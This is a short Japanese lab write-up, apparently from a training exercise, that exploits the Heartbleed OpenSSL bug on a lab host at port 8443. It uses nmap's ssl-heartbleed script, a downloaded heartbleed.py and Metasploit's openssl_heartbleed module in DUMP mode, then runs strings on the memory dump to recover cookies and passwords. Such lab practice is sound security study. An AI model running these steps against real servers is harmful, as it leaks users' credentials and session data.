Hello there, ('ω')ノ
Heartbleedは、OpenSSL(暗号化ライブラリ)のバグのことで。
このバグを利用して、パスワードやクッキー情報が多数流出したようで。
今回、8443ポートでログインしてとのことで。
まずは、スクリプトをダウンロードして。
いつものnmapでOpenSSL Heartbleed脆弱性のチェックをしてみると。
nmap -p8443 --script ssl-heartbleed 10.4.128.221
下記のようなコメントが。
Heartbleed Bugは、SSL / TLS暗号化によって保護されることを目的とした人気のあるOpenSSL暗号化ソフトウェアの情報に深刻な脆弱性をもたらします。
下記で、ログインしなおして。
ダウンロードしたスクリプトを実行してみると。
クッキーやパスワードが確認できて。
sudo python heartbleed.py 10.4.128.221
とりあえず、msfconsoleを起動して。
heartbleedを検索して。
下記を使用することに。
use auxiliary/scanner/ssl/openssl_heartbleed
また、オプション以外に下記を設定して詳細情報を得てみることに。
set verbose true
はじめに実行したスクリプトと同じような内容で。
これでは、ログインIDが取得できず。
show info
とりあえず、ファイルにダンプすることに。
set action DUMP
保存されたファイルを下記のコマンドで開いてみると。
こっちのほうがわかりやすくて。
strings 20201125234912_default_10.4.128.221_openssl.heartble_747085.bin
Best regards, (^^ゞ